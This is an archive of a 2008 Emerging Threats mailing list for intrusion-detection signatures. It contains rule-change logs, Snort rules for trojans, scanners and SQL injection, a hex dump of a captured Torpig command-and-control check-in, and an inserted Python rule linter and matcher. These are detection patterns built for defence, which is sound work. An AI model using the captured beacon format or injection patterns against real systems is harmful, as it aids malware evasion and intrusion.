url,www.milw0rm.com/exploits/6613 || url,secunia.com/Advisories/31969/ 2008623 || ET TROJAN Cinmus.Checkin 1 2008624 || ET TROJAN Cinmus.Checkin 2 2008625 || ET P2P Pando Client User-Agent Detected (Mozilla/4.0 (Windows\; U) Pando/1.xx) 2008626 || ET TROJAN PlayMP3z.biz Related Spyware/Trojan Install Report 2008627 || ET SCAN Httprecon Web Server Fingerprint Scan || url,www.computec.ch/projekte/httprecon/ 2008628 || ET SCAN WSFuzzer Web Application Fuzzing || url,www.owasp.org/index.php/Category\:OWASP_WSFuzzer_Project 2008629 || ET SCAN Wikto Backend Data Miner Scan || url,www.sensepost.com/research/wikto/WiktoDoc1-51.htm 2008639 || ET TROJAN Tibs Trojan Downloader 2008640 || ET SCAN SIP erase_registrations/add registrations attempt || url,www.hackingvoip.com/sec_tools.html 2008641 || ET SCAN sipscan probe || url,www.hackingvoip.com/sec_tools.html 2008642 || ET TROJAN Keylogger PRO GOLD Post 2008643 || ET MALWARE Suspicious User-Agent Detected (Downloader1.2) 2008644 || ET TROJAN Spy-Net Trojan Connection 2008645 || ET TROJAN Spy-Net Trojan Connection (2) 2008646 || ET CURRENT_EVENTS Trojan resulting from Fake MS Updates Email Login to CnC || url,isc.sans.org/diary.html?storyid=5159 2008647 || ET MALWARE Internet-antivirus.com Related Fake AV User-Agent Detected (Update Internet Antivirus) 2008648 || ET WEB_SPECIFIC trac q variable open redirect || url,cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2951 2008649 || ET WEB_SPECIFIC Realtor v_cat SQL Injection || url,secunia.com/advisories/32149/ || url,www.milw0rm.com/exploits/6694 2008650 || ET WEB_SPECIFIC Autos catid SQL Injection || url,secunia.com/advisories/32139/ || url,www.milw0rm.com/exploits/6696 2008651 || ET WEB_SPECIFIC JMweb MP3 src Multiple Local File Inclusion || url,www.milw0rm.com/exploits/6669 2008652 || ET WEB_SPECIFIC ScriptsEz Easy Image Downloader id File Disclosure || url,secunia.com/Advisories/32210/ || url,www.milw0rm.com/exploits/6715 2008653 || ET WEB_SPECIFIC Built2go Real Estate 
Listings event_id SQL Injection || url,secunia.com/Advisories/32129/ || url,www.milw0rm.com/exploits/6697 2406029 || ET RBN Known Russian Business Network Monitored Domains (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406030 || ET RBN Known Russian Business Network Monitored Domains (31) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406031 || ET RBN Known Russian Business Network Monitored Domains (32) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407029 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407030 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (31) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407031 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (32) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork -> Added to emerging-virus.rules (5): #Sig by Daniel Clemens #ref: 13bce3215f758d69a6574f7018ed8c32 #This one is lets the client know the server is connected and ready #by jeremy conway #ref: 61441e5fab0173480c05f876e5ebd07b -> Added to emerging-voip.rules (2): #by Kevin Ross #by Kevin Ross -> Added to emerging-web.rules (1): #by Stillsecure (stillsecure.com) -> Added to emerging-web_sql_injection.rules (1): #by Russ McRee -> Added to emerging.rules (1): # fake email for MS Updates results in a trojan that uses this fake UA [---] Removed non-rule lines: [---] -> Removed from emerging-drop-BLOCK.rules (2): # VERSION 1316 # Generated 2008-10-04 00:03:02 EDT -> Removed from emerging-drop.rules (2): # VERSION 1316 # Generated 2008-10-04 00:03:02 EDT -> Removed from emerging-rbn-BLOCK.rules (2): # VERSION 77 # Updated 2008-10-01 18:23:28 -> Removed from emerging-rbn.rules (2): # VERSION 77 # Updated 2008-10-01 18:23:28 -> Removed from emerging-sid-msg.map (20): 2002916 || ET EXPLOIT RealVNC Authentication 
Bypass Attempt || cve,2006-2369 || url,www.cl.cam.ac.uk/Research/DTG/attarchive/vnc/rfbproto.pdf || url,archives.neohapsis.com/archives/fulldisclosure/2006-05/0356.html || url,secunia.com/advisories/20107/ 2008546 || ET CURRENT_EVENTS Unknown Downloader Checkin part 1 of 2 2500067 || ET COMPROMISED Known Compromised or Hostile Host Traffic (68) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500068 || ET COMPROMISED Known Compromised or Hostile Host Traffic (69) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500069 || ET COMPROMISED Known Compromised or Hostile Host Traffic (70) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500070 || ET COMPROMISED Known Compromised or Hostile Host Traffic (71) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500071 || ET COMPROMISED Known Compromised or Hostile Host Traffic (72) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500072 || ET COMPROMISED Known Compromised or Hostile Host Traffic (73) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500073 || ET COMPROMISED Known Compromised or Hostile Host Traffic (74) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500074 || ET COMPROMISED Known Compromised or Hostile Host Traffic (75) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500075 || ET COMPROMISED Known Compromised or Hostile Host Traffic (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510067 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (68) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510068 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (69) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510069 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (70) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510070 || ET COMPROMISED Known Compromised or Hostile Host Traffic - 
BLOCKING (71) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510071 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (72) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510072 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (73) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510073 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (74) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510074 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (75) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510075 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (20): 2002916 || ET EXPLOIT RealVNC Authentication Bypass Attempt || cve,2006-2369 || url,www.cl.cam.ac.uk/Research/DTG/attarchive/vnc/rfbproto.pdf || url,archives.neohapsis.com/archives/fulldisclosure/2006-05/0356.html || url,secunia.com/advisories/20107/ 2008546 || ET CURRENT_EVENTS Unknown Downloader Checkin part 1 of 2 2500067 || ET COMPROMISED Known Compromised or Hostile Host Traffic (68) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500068 || ET COMPROMISED Known Compromised or Hostile Host Traffic (69) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500069 || ET COMPROMISED Known Compromised or Hostile Host Traffic (70) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500070 || ET COMPROMISED Known Compromised or Hostile Host Traffic (71) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500071 || ET COMPROMISED Known Compromised or Hostile Host Traffic (72) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500072 || ET COMPROMISED Known Compromised or Hostile Host Traffic (73) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500073 || ET 
COMPROMISED Known Compromised or Hostile Host Traffic (74) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500074 || ET COMPROMISED Known Compromised or Hostile Host Traffic (75) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500075 || ET COMPROMISED Known Compromised or Hostile Host Traffic (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510067 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (68) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510068 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (69) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510069 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (70) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510070 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (71) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510071 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (72) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510072 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (73) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510073 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (74) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510074 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (75) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510075 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging.rules (1): #another unknown, soo to be IDd. 
Sig by Daniel Clemens From emerging at emergingthreats.net Sun Oct 12 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sun, 12 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081012200008.4BA8C45026@goliath.jonkmans.com> [***] Results from Oinkmaster started Sun Oct 12 16:00:08 2008 [***] [+++] Added rules: [+++] 2008654 - ET SCAN SQLix SQL Injection Vector Scan (emerging-scan.rules) 2008655 - ET MALWARE Frequently Used Fake trojan downloader User Agent (emerging-malware.rules) 2008656 - ET MALWARE AV2010 Rogue Security Application User-Agent (AV2010) (emerging-malware.rules) 2008657 - ET MALWARE Suspicious User-Agent Detected (Compatible) (emerging-malware.rules) 2008658 - ET MALWARE Suspicious User-Agent Detected (GetUrlSize) (emerging-malware.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-malware.rules (3): #by jeremy conway # ref: 6bbaadcf801e9026d27521ae3f093fe0 # ref: 08e90268f52d942927c9f89fc9b796fb -> Added to emerging-sid-msg.map (5): 2008654 || ET SCAN SQLix SQL Injection Vector Scan || url,www.owasp.org/index.php/Category:OWASP_SQLiX_Project 2008655 || ET MALWARE Frequently Used Fake trojan downloader User Agent 2008656 || ET MALWARE AV2010 Rogue Security Application User-Agent (AV2010) 2008657 || ET MALWARE Suspicious User-Agent Detected (Compatible) 2008658 || ET MALWARE Suspicious User-Agent Detected (GetUrlSize) -> Added to emerging-sid-msg.map.txt (5): 2008654 || ET SCAN SQLix SQL Injection Vector Scan || url,www.owasp.org/index.php/Category:OWASP_SQLiX_Project 2008655 || ET MALWARE Frequently Used Fake trojan downloader User Agent 2008656 || ET MALWARE AV2010 Rogue Security Application User-Agent (AV2010) 2008657 || ET MALWARE Suspicious User-Agent Detected (Compatible) 2008658 || ET MALWARE Suspicious User-Agent Detected (GetUrlSize) [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (4): 2500065 || ET 
COMPROMISED Known Compromised or Hostile Host Traffic (66) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500066 || ET COMPROMISED Known Compromised or Hostile Host Traffic (67) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510065 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (66) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510066 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (67) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (4): 2500065 || ET COMPROMISED Known Compromised or Hostile Host Traffic (66) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500066 || ET COMPROMISED Known Compromised or Hostile Host Traffic (67) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510065 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (66) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510066 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (67) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From pepperjack at afferentsecurity.com Mon Oct 13 08:20:12 2008 From: pepperjack at afferentsecurity.com (Jack Pepper) Date: Mon, 13 Oct 2008 07:20:12 -0500 Subject: [Emerging-Sigs] free colons on rules Message-ID: <20081013072012.2kgx10lhc400o0sc@mail.afferentsecurity.com> There has to be a pun involving "free colons" somewhere, but I just can't come up with one . Maybe "colons are escaping ..." 
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Trojan resulting from Fake MS Updates Email Login to CnC"; flow:established,to_server; content:" HTTP/1.0|0d 0a|User-Agent\: Mozilla/4.0 (compatible\; MSIE 6.0\; Windows XP 2600.xpsp.9786-27197)|0d 0a|"; classtype:trojan-activity; reference:url,isc.sans.org/diary.html?storyid=5159; sid:2008646; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET SCAN SQLix SQL Injection Vector Scan"; flow:established,to_server; content:"GET "; depth:4; content:"myVAR=1234"; content:"Windows 98"; offset:36; within:120; classtype:attempted-recon; reference:url,www.owasp.org/index.php/Category\:OWASP_SQLiX_Project; sid:2008654; rev:1;)

jp
--
Framework? I don't need no stinking framework!
----------------------------------------------------------------
@fferent Security Labs: Isolate/Insulate/Innovate
http://www.afferentsecurity.com

From signatures at stillsecure.com Mon Oct 13 09:49:40 2008
From: signatures at stillsecure.com (signatures)
Date: Mon, 13 Oct 2008 07:49:40 -0600
Subject: [Emerging-Sigs] StillSecure: 3 New Signatures - Oct-13 -2008
Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2907@webmail.latis.com>

Hi Matt,

Please find 3 New Signatures below

1. Link Trader Script linkid SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Link Trader Script linkid SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/ratelink.php?lnkid="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/Advisories/32077/; reference:url,www.milw0rm.com/exploits/6650; sid:8446; rev:1;)

2.
MunzurSoft Wep Portal W3 kat SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"MunzurSoft Wep Portal W3 kat SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/kategori.asp?kat="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack;reference:url,secunia.com/Advisories/32238/; reference:url,www.milw0rm.com/exploits/6725; sid:8447; rev:1;)

3. Joomla OwnBiblio Component catid SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Joomla OwnBiblio Component catid SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/index.php?option=com_ownbiblio&view=catalogue"; nocase; uricontent:"&catid="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/Advisories/32235/; reference:url,www.milw0rm.com/exploits/6730; sid:8448; rev:1;)

Looking forward to your comments if any...

Thanks & Regards,
StillSecure
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081013/0acd1cde/attachment.html

From jonkman at jonkmans.com Mon Oct 13 12:29:27 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Mon, 13 Oct 2008 12:29:27 -0400
Subject: [Emerging-Sigs] Torpig
In-Reply-To: <48EB6B30.1010204@oitsec.umn.edu>
References: <48EB6B30.1010204@oitsec.umn.edu>
Message-ID: <48F37767.6010007@jonkmans.com>

Posted this:

#by Paul Dokas
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Torpig Infection Reporting"; flow:established,to_server; content:"POST "; depth:5; content:"HTTP/1.0|0d 0a|"; content:!"|0d 0a|User-Agent\: "; content:"|0d 0a|Content-Length\: 0|0d 0a|"; content:"|0d 0a|Connection\: close|0d 0a|"; classtype:trojan-activity; sid:2008660; rev:1;)

Added a few |0d 0a|'s to make the string larger is all.

Good this way?
Matt

Paul Dokas wrote:
> We found some torpig traffic here on our network yesterday that was not
> being caught by any rules. One of my co-workers put together a rule to
> find this traffic and I tuned it a little. Here it is:
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg: "TROJAN Torpig Infection"; flow: established,to_server; content:"POST"; content:"HTTP/1.0"; content:"Content-Length: 0"; content:"Connection: close"; classtype:trojan-activity;)
>
> Hits look like this:
>
> 000 : 50 4F 53 54 20 2F 43 37 33 39 42 35 43 35 42 45 POST /C739B5C5BE
> 010 : 33 43 38 35 41 44 2F 41 42 51 51 36 6D 56 6A 4A 3C85AD/ABQQ6mVjJ
> 020 : 46 63 55 67 30 56 56 62 75 59 48 67 6D 56 56 64 FcUg0VVbuYHgmVVd
> 030 : 79 30 52 74 6E 63 47 46 6D 46 67 64 32 73 52 30 y0RtncGFmFgd2sR0
> 040 : 6E 63 77 41 2B 42 2F 31 4E 4D 68 41 68 51 43 4A ncwA+B/1NMhAhQCJ
> 050 : 51 51 4E 4E 6D 49 57 42 57 46 30 72 36 52 67 6B QQNNmIWBWF0r6Rgk
> 060 : 4E 4E 30 4A 7A 42 41 57 78 61 6A 56 36 46 6B 34 NN0JzBAWxajV6Fk4
> 070 : 41 36 30 56 78 42 47 41 63 62 67 42 42 2F 44 52 A60VxBGAcbgBB/DR
> 080 : 73 49 68 70 4B 41 36 59 65 59 45 45 72 52 43 42 sIhpKA6YeYEErRCB
> 090 : 43 47 62 4E 6D 4B 6D 51 47 51 67 32 32 45 6D 59 CGbNmKmQGQg22EmY
> 0a0 : 4E 64 52 64 69 43 51 50 36 4D 6A 56 77 43 30 63 NdRdiCQP6MjVwC0c
> 0b0 : 48 72 42 46 6D 41 57 55 5A 59 45 42 41 20 48 54 HrBFmAWUZYEBA HT
> 0c0 : 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 66 69 TP/1.0..Host: fi
> 0d0 : 62 69 64 6F 2E 63 6F 6D 0D 0A 43 6F 6E 74 65 6E bido.com..Conten
> 0e0 : 74 2D 4C 65 6E 67 74 68 3A 20 30 0D 0A 43 6F 6E t-Length: 0..Con
> 0f0 : 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A nection: close..
> 100 : 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 Content-Type: ap
> 110 : 70 6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D plication/x-www-
> 120 : 66 6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D form-urlencoded.
> 130 : 0A 0D 0A ...
>
>
> I'm sure that this rule can be tuned even more.
At this point we're no > longer getting any false positives. > > Enjoy! > > Paul -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Mon Oct 13 12:33:22 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Mon, 13 Oct 2008 12:33:22 -0400 Subject: [Emerging-Sigs] free colons on rules In-Reply-To: <20081013072012.2kgx10lhc400o0sc@mail.afferentsecurity.com> References: <20081013072012.2kgx10lhc400o0sc@mail.afferentsecurity.com> Message-ID: <48F37852.2040708@jonkmans.com> Freed colons? Evacuated colon? Anyway, fixed up, Thanks Jack! matt Jack Pepper wrote: > There has to be a pun involving "free colons" somewhere, but I just > can't come up with one . Maybe "colons are escaping ..." > > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET > CURRENT_EVENTS Trojan resulting from Fake MS Updates Email Login to > CnC"; flow:established,to_server; content:" HTTP/1.0|0d > 0a|User-Agent\: Mozilla/4.0 (compatible\; MSIE 6.0\; Windows XP > 2600.xpsp.9786-27197)|0d 0a|"; classtype:trojan-activity; > reference:url,isc.sans.org/diary.html?storyid=5159; sid:2008646; rev:1;) > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET SCAN > SQLix SQL Injection Vector Scan"; flow:established,to_server; content:"GET "; > depth:4; content:"myVAR=1234"; content:"Windows 98"; offset:36; within:120; > classtype:attempted-recon; > reference:url,www.owasp.org/index.php/Category\:OWASP_SQLiX_Project; > sid:2008654; rev:1;) > > > > jp > -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From dokas at oitsec.umn.edu Mon Oct 13 12:38:05 2008 From: dokas at oitsec.umn.edu (Paul 
Dokas)
Date: Mon, 13 Oct 2008 11:38:05 -0500
Subject: [Emerging-Sigs] Torpig
In-Reply-To: <48F37767.6010007@jonkmans.com>
References: <48EB6B30.1010204@oitsec.umn.edu> <48F37767.6010007@jonkmans.com>
Message-ID: <48F3796D.4060707@oitsec.umn.edu>

Matt Jonkman wrote:
> Posted this:
> #by Paul Dokas
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
> Torpig Infection Reporting"; flow:established,to_server; content:"POST
> "; depth:5; content:"HTTP/1.0|0d 0a|"; content:!"|0d 0a|User-Agent\: ";
> content:"|0d 0a|Content-Length\: 0|0d 0a|"; content:"|0d 0a|Connection\:
> close|0d 0a|"; classtype:trojan-activity; sid:2008660; rev:1;)
>
> Added a few |0d 0a|'s to make the string larger is all.
>
> Good this way?

This looks good. And I can only take some of the credit for creating this
rule. Others here in my group helped in its creation. I'll let them step
forward if they'd like the recognition.

Paul
--
Paul Dokas dokas at oitsec.umn.edu
======================================================================
Don Juan Matus: "an enigma wrapped in mystery wrapped in a tortilla."
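A small Python check and matcher for the two issues the threads above deal with, added here as an illustration and not anything posted on the list or shipped with the Emerging Threats rules. It covers the bare colons that Jack's "free colons" message and Matt's Torpig edit escape (the Snort 2.x rule parser of the time needed `:` and `;` backslash-escaped inside content strings, and the sid-msg.map diff shows the same `\:` fix applied to a reference URL), and it shows what Matt's `depth:5`, `|0d 0a|` anchoring and negated `User-Agent` content change about when ET 2008660 fires. Paul's first rule, Matt's rule and the Torpig check-in are taken from the thread (the payload is transcribed from Paul's hex dump); the benign browser POST is constructed for the comparison, and the content evaluation is deliberately simplified (no `nocase`, `distance` or `within`), which is enough for these two rules but is not Snort's full matcher.

```python
import re

# Characters that had to be backslash-escaped inside a Snort 2.x content string;
# bare ':' and ';' are what the "free colons" fix and Matt's Torpig edit address.
MUST_ESCAPE = ':;"\\'
_CONTENT_RE = re.compile(r'content:\s*!?"((?:[^"\\]|\\.)*)"')
_REF_URL_RE = re.compile(r'reference:url,([^;)\s]+)')

def unescaped_positions(text, chars):
    """Indexes of characters from `chars` that are not preceded by a backslash."""
    hits, i = [], 0
    while i < len(text):
        if text[i] == "\\":
            i += 2                      # skip the escaped character
            continue
        if text[i] in chars:
            hits.append(i)
        i += 1
    return hits

def lint_rule(rule):
    """(option, char, offset) for each bare must-escape char in a content string
    and each bare ':' in a reference:url value; an empty list means clean."""
    findings = []
    for m in _CONTENT_RE.finditer(rule):
        for pos in unescaped_positions(m.group(1), MUST_ESCAPE):
            findings.append(("content", m.group(1)[pos], pos))
    for m in _REF_URL_RE.finditer(rule):
        for pos in unescaped_positions(m.group(1), ":"):
            findings.append(("reference:url", ":", pos))
    return findings

def rule_options(rule):
    """Split the (...) body into (keyword, value) pairs; only an unescaped ';' ends an option."""
    body = rule[rule.index("(") + 1:rule.rindex(")")]
    opts, cur, escaped = [], "", False
    for ch in body:
        if ch == ";" and not escaped:
            opts.append(cur.strip())
            cur = ""
        else:
            cur += ch
        escaped = ch == "\\" and not escaped
    return [tuple(o.split(":", 1)) if ":" in o else (o, "") for o in opts if o]

def content_bytes(value):
    """Decode a content string: |0d 0a| hex runs, backslash escapes, literal text."""
    out, i = bytearray(), 0
    while i < len(value):
        if value[i] == "|":
            end = value.index("|", i + 1)
            out += bytes.fromhex(value[i + 1:end])
            i = end + 1
        elif value[i] == "\\":
            out += value[i + 1].encode()
            i += 2
        else:
            out += value[i].encode()
            i += 1
    return bytes(out)

def rule_matches(rule, payload):
    """Simplified content evaluation: every content is searched from the start of the
    payload (no distance/within/nocase), depth caps the search window, and a negated
    content (content:!"...") must be absent for the rule to fire."""
    contents = []                       # [negated, pattern, depth]
    for key, value in rule_options(rule):
        if key == "content":
            value = value.strip()
            pattern = content_bytes(value.lstrip("!").strip('"'))
            contents.append([value.startswith("!"), pattern, None])
        elif key == "depth" and contents:
            contents[-1][2] = int(value)
    for negated, pattern, depth in contents:
        window = payload if depth is None else payload[:depth]
        if (pattern in window) == negated:  # required one missing / forbidden one present
            return False
    return True

# Paul's first rule (bare colons, no negated User-Agent) and Matt's escaped,
# tightened ET 2008660, both as posted in the thread.
PAUL_RULE = r'''alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg: "TROJAN Torpig Infection"; flow: established,to_server; content:"POST"; content:"HTTP/1.0"; content:"Content-Length: 0"; content:"Connection: close"; classtype:trojan-activity;)'''
TORPIG_RULE = r'''alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Torpig Infection Reporting"; flow:established,to_server; content:"POST "; depth:5; content:"HTTP/1.0|0d 0a|"; content:!"|0d 0a|User-Agent\: "; content:"|0d 0a|Content-Length\: 0|0d 0a|"; content:"|0d 0a|Connection\: close|0d 0a|"; classtype:trojan-activity; sid:2008660; rev:1;)'''
# The Torpig check-in, transcribed from the hex dump in Paul's message.
TORPIG_PAYLOAD = (
    b"POST /C739B5C5BE3C85AD/ABQQ6mVjJFcUg0VVbuYHgmVVdy0RtncGFmFgd2sR0ncwA+B/1NMhAhQCJ"
    b"QQNNmIWBWF0r6RgkNN0JzBAWxajV6Fk4A60VxBGAcbgBB/DRsIhpKA6YeYEErRCBCGbNmKmQGQg22EmY"
    b"NdRdiCQP6MjVwC0cHrBFmAWUZYEBA HTTP/1.0\r\nHost: fibido.com\r\n"
    b"Content-Length: 0\r\nConnection: close\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
)
# Constructed benign empty-body HTTP/1.0 POST; its User-Agent header is what the
# negated content in ET 2008660 keys on.
BENIGN_POST = (
    b"POST /login HTTP/1.0\r\nHost: www.example.test\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
    b"Content-Length: 0\r\nConnection: close\r\n\r\n"
)

if __name__ == "__main__":
    print("lint:", lint_rule(PAUL_RULE), lint_rule(TORPIG_RULE))
    for name, payload in (("torpig", TORPIG_PAYLOAD), ("benign", BENIGN_POST)):
        print(name, "Paul:", rule_matches(PAUL_RULE, payload), "ET:", rule_matches(TORPIG_RULE, payload))
```

Run as-is, the lint of Paul's rule reports the two bare colons in `Content-Length: 0` and `Connection: close` that Matt escaped, and ET 2008660 lints clean. Paul's rule fires on both payloads, while ET 2008660 fires only on the Torpig check-in: the constructed browser POST has the same `HTTP/1.0`, `Content-Length: 0` and `Connection: close` headers, and it is the negated `|0d 0a|User-Agent\: ` content that keeps it from matching. Because the evaluation ignores `nocase`, `distance` and `within`, it is only valid for rules such as these two that use none of them.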
From emerging at emergingthreats.net Mon Oct 13 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Mon, 13 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081013200008.DC23445026@goliath.jonkmans.com> [***] Results from Oinkmaster started Mon Oct 13 16:00:08 2008 [***] [+++] Added rules: [+++] 2008659 - ET MALWARE Suspicious User-Agent Detected (DigitAl56K/6.3) (emerging-malware.rules) 2008660 - ET TROJAN Torpig Infection Reporting (emerging-virus.rules) [///] Modified active rules: [///] 2008549 - ET MALWARE Systemdoctor.com/Antivir2008 related Fake Anti-Virus User-Agent (AntivirXP) (emerging-malware.rules) 2008646 - ET CURRENT_EVENTS Trojan resulting from Fake MS Updates Email Login to CnC (emerging.rules) 2008654 - ET SCAN SQLix SQL Injection Vector Scan (emerging-scan.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (3): 2008654 || ET SCAN SQLix SQL Injection Vector Scan || url,www.owasp.org/index.php/Category\:OWASP_SQLiX_Project 2008659 || ET MALWARE Suspicious User-Agent Detected (DigitAl56K/6.3) 2008660 || ET TROJAN Torpig Infection Reporting -> Added to emerging-sid-msg.map.txt (3): 2008654 || ET SCAN SQLix SQL Injection Vector Scan || url,www.owasp.org/index.php/Category\:OWASP_SQLiX_Project 2008659 || ET MALWARE Suspicious User-Agent Detected (DigitAl56K/6.3) 2008660 || ET TROJAN Torpig Infection Reporting -> Added to emerging-virus.rules (1): #by Paul Dokas [---] Removed 